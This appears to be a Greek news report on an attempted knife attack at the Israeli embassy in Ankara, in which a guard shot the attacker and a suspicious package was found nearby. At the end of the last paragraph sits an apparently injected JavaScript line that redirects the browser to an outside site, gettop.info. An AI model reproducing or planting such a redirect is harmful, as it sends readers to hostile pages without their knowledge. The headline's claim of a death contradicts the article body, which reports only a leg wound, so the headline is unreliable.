Πυροβολισμοί με ένα νεκρό στην πρεσβεία του Ισραήλ στην Τουρκία

0
8

 

Σύμφωνα με το CNN Turk, πραγματοποιήθηκε απόπειρα επίθεσης με μαχαίρι στην είσοδο της ισραηλινής πρεσβείας στην Άγκυρα και ο δράστης πυροβολήθηκε στο πόδι.

«Η πρεσβεία του Ισραήλ στην Άγκυρα έγινε σήμερα στόχος απόπειρας επίθεσης από ένα άτομο οπλισμένο με μαχαίρι, το οποίο τραυματίσθηκε από τα πυρά ενός φρουρού» σύμφωνα με το ισραηλινό υπουργείο Εξωτερικών.
«Τα μέλη του προσωπικού είναι σώα και αβλαβή«, δήλωσε ο εκπρόσωπος του υπουργείου Εξωτερικών Εμμανουέλ Ναχσόν. Ο ίδιος διευκρίνισε πως ο δράστης ήταν «κατά τα φαινόμενα» οπλισμένος μ’ ένα μαχαίρι και πως τραυματίσθηκε από τις σφαίρες του φρουρού πριν πλησιάσει το κτίριο.

To ιδιωτικό τουρκικό τηλεοπτικό δίκτυο, NTV, μετέδωσε επίσης πως ένα άτομο «τραυματίσθηκε και εξουδετερώθηκε» κατά το επεισόδιο, το οποίο σημειώθηκε όταν δύο άτομα αποπειράθηκαν να εισέλθουν στην πρεσβεία, χωρίς όμως αν υπάρχουν περισσότερες πληροφορίες για τον δεύτερο δράστη.

Στο μεταξύ όπως μεταδίδει το CNN Turk, ένα ύποπτο πακέτο έχει εντοπιστεί κοντά στο κτίριο της πρεσβείας όπου και σπεύδουν πυροτεχνουργοί, προκειμένου να το εξετάσουν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here